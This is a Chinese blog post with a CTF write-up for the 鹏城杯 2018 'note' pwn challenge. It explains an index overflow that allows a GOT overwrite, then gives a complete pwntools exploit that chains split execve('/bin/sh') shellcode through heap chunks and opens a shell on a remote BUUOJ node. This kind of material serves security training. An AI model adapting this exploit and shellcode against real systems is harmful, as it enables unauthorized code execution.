鹏城杯_2018_note

最新推荐文章于 2024-09-16 23:17:14 发布
最新推荐文章于 2024-09-16 23:17:14 发布
阅读量373 收藏
点赞数
分类专栏: pwn 二进制漏洞 CTF 文章标签: 安全 PWN CTF 二进制漏洞 缓冲区溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/107567580
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏

鹏城杯_2018_note

首先,检查一下程序的保护机制

然后,我们用IDA分析一下,在edit功能里,index的值可以被nptr溢出覆盖,因此,我们可以控制index的值,这样,我们就可以在GOT里写入一个堆地址。

由于没有开启NX保护,我们只需要再在堆里布置shellcode即可。

#coding:utf8
from pwn import *

context(os='linux',arch='amd64')
#sh = process('./2018_note')
sh = remote('node3.buuoj.cn',28075)

def add(index,size,content):
   sh.sendline('1')
   sleep(0.01)
   sh.sendline(str(index))
   sleep(0.01)
   sh.sendline(size)
   sleep(0.01)
   sh.sendline(content)

#溢出覆盖index,使得heap[i]对应exit的got表,这样就能将exit的got表修改为一个heap地址
payload = '13'.ljust(0xA,'\x00') + p32(0xFFFFFFF8)
sc1 = asm('''mov rax,0x0068732f6e69622f
             jmp $+0x16
          ''')
add(0,payload,sc1)
sc2 = asm('''push rax
             xor rax,rax
             mov al,0x3B
             mov rdi,rsp
             jmp $+0x17
          ''')
add(1,'13',sc2)

sc3 = asm('''xor rsi,rsi
             xor rdx,rdx
             syscall
          ''')
add(2,'13',sc3)
#getshell
sh.sendline('5')

sh.interactive()

 

ha1vk
关注
专栏目录
[鹏城 2022]Misc_water
m0_64444909的博客
03-19 310
这里的CRC指的是CRC32,也就是PNG图片的一个效验位,是一种不可逆运算,类似于MD5,作为数据效验或效验文件的完整性使用。(1). png的文件头:8个字节为 png的文件头(固定)(2). 4个字节十进制为13,代表头部数据块的长度为13(3). 4个字节ASCII码为IHDR,表明数据块为IHDR(4). 接下来是13位数据块(IHDR)前四个字节代表该图片的宽(不固定,可变)后四个字节代表该图片的高(不固定,可变)
2022鹏城web
m0_61083409的博客
07-29 1431
先自我介绍一下,小编13年上师交大毕业,曾经在小公司待过,去过华为OPPO等大厂,18年进入阿里,直到现在。扫描后台发现存在.git,利用githack工具拿到.git文件夹,利用gitlog查看commitid,利用gitreset--hardbe50c81b903b0005d0740d221e74c51340251bc2进行恢复拿到源码。应该是需要删除掉网站根目录下的bocai.html、bocai.png,然后再来执行,不过暂时没有删除的权限,所以应该是需要提权了。...
鹏程2018 Pwn Writeup
Kaller的博客
12-05 1478
PWN  code   hash爆破(By:Apeng师傅): 得到wyBTs。 这里栈溢出,控制 ret后,“pop rdi ret”用来调用call。 1.leak_libc 把puts的got.plt表用puts函数输出 2.计算偏移,得到system和字符串/bin/sh 3.调用system。 from pwn import * context.log...
鹏城2018WEB shadow题解
HuaSir的博客
12-02 1737
前言 今天打完了鹏城,还是一脸懵逼,主办方疯狂放提示,选手疯狂懵逼。。。 我在一堆脑洞题之间还是看到了一道比较有意思的web题目,虽然最后也没出flag,但还是挺有感悟的。 题目描述 给你一个flask搭建的网站,除了登录注册之外也没发现什么功能, 注释里看到有/upload路径,但访问提示需要admin权限。又四处游荡发现几个js不存在,回显是: 看到这里,应该是有404页面的SSTI漏洞了...
pwn_note
fa1lr4in的小博客
02-11 278
gcc -m32 -g -save-temps hello.c           //生成hello.i,hello.s,hello.o readelf -h hello.o                                    //读取文件头 c = 预编译 汇编 elf (重定位)a.out objdump -d hello                          ...
2022鹏城CTF---Crypto wp
3tefanie丶zhou的博客
07-07 2277
【我们对别人,对这个世界,所有的误会,可能都来自三个字,”我觉得“。】
2022鹏城CTF---Crypto
Luiino的博客
09-18 2364
第一部分,e与phi_n不互素,gcd(e,phi_n) == 4,此时e对phi_n没有逆元,但gcd(e//t,phi_n) == 1。mod n,由上面的for循环可以知道M与初始m的关系:M = m * (p-q-1)!对n进行分解,得到p、q,小的是q。记print(pow(m,e,n))里的m为M,故有c2 =第三部分, 看到M = 2022 * m * 1011 * p,又n = p*q,且c =记两输出结果分别为c1、c2,由print(pow(2,e,n))可以得到:c1 =
鹏城-2018-note
11-05
附件
181202 逆向-2018鹏城
whklhhhh的博客
12-02 1463
本次比赛的各个Re题目都对各种公开密码算法的运用考察比较多,还是挺有意思的~ Reverse badblock main函数打开发现是C++写的,充斥大量无用代码 于是转头执行,发现接收输入后回弹err... 搜索字符串发现有三处引用 分别是两个anti_debug和一个puts_wrong anti_debug分别通过ptrace和getpid()的方法,不必多说,调试的时候直接绕过即可 put...
[BUUCTF-pwn] 鹏城_2018_easycalc
weixin_52640415的博客
02-09 321
保护基本全开,在add时有个off_by_null漏洞。fd位置只能修改。 unsigned __int64 m1add() { unsigned int v0; // ebx unsigned int v2; // [rsp+4h] [rbp-2Ch] BYREF size_t size; // [rsp+8h] [rbp-28h] BYREF __int64 v4; // [rsp+10h] [rbp-20h] BYREF unsigned __int64 v5; // [rsp
2020年第六届鹏程数学邀请赛四年级参赛题目(有参考答案).pdf
09-27
2020年第六届鹏程数学邀请赛四年级参赛题目(有参考答案).pdf
2022鹏城
unexpectedthing的博客
08-30 2383
2022鹏城
[BUUCTF-pwn] 鹏城_2018_overint
weixin_52640415的博客
02-08 883
老大的帽儿。题目分3部分,第1部分要求输入4个字节这4个字节经过运算得35 __int64 __fastcall sub_4007D1(__int64 a1, int a2) { int v3; // [rsp+18h] [rbp-8h] int i; // [rsp+1Ch] [rbp-4h] v3 = 0; for ( i = 1; i < a2; ++i ) { printf("v[i] is %d\n", (unsigned int)*(char *)(i +
2018鹏程 初赛 Writeup
CODER的博客
12-14 2213
1.签到 公众号回复 2.Traffic Light misc stegsolve打开看可以发现1000多帧 网上找了个脚本分离所有帧(python3+PIL) 根据红黄绿信号猜测0 1 空格 可以图像识别 但细心点可以发现文件大小并不相同 于是根据图像大小得到一串数字 相应的图片做一个映射即可 3.Quotes misc 脑洞题 My+mission+in+life+is+not+mer ely...
python atm银行取款系统_ATM管理系统(python)
weixin_39554434的博客
12-04 972
import random登陆界面************************************ ** 欢迎来到lyb银行,请选择服务! ** ************************************'''display2='''*****...
时间&安全精细化管理平台存在未授权访问漏洞
2301_77012231的博客
09-14 315
登录--时间&安全精细化管理平台存在未授权访问漏洞导致与员工信息泄露。
SSHamble:一款针对SSH技术安全的研究与分析工具
FreeBuf_的博客
09-11 1180
SSHamble是一款功能强大的SSH技术安全分析与研究工具,该工具基于Go语言开发,可以帮助广大研究人员更好地分析SSH相关的安全技术与缺陷问题。
【农信网-注册/登录安全分析报告】
最新发布
09-16 970
北京农信互联科技集团有限公司是一家农业互联网高科技企业,以“用互联网改变农业”为使命,致力于构建最有影响力的农业数智生态平台,推动中国农业数字化转型升级。作为农业互联网领域的“独角兽”企业, 技术实力也应该不错,但采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“需求这么赶,当然是先实现功能啊”,“业务量很小啦,系统就这么点人用,不怕的。
【免费刷题】实验室安全第一知识题库分享
nulixueBe的博客
09-13 493
人工智能识别上海985大学的实验室安全知识手册,生成题库,直接刷题
鹏城python亿万富翁
08-25
"鹏城Python亿万富翁"通常是指一个编程挑战项目或者竞赛,它可能是基于Python语言设计的一个实战题目,目的是让学生通过编写程序来模拟一个财富管理的游戏。在这个游戏中,参与者需要创建一个角色,比如亿万富翁,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值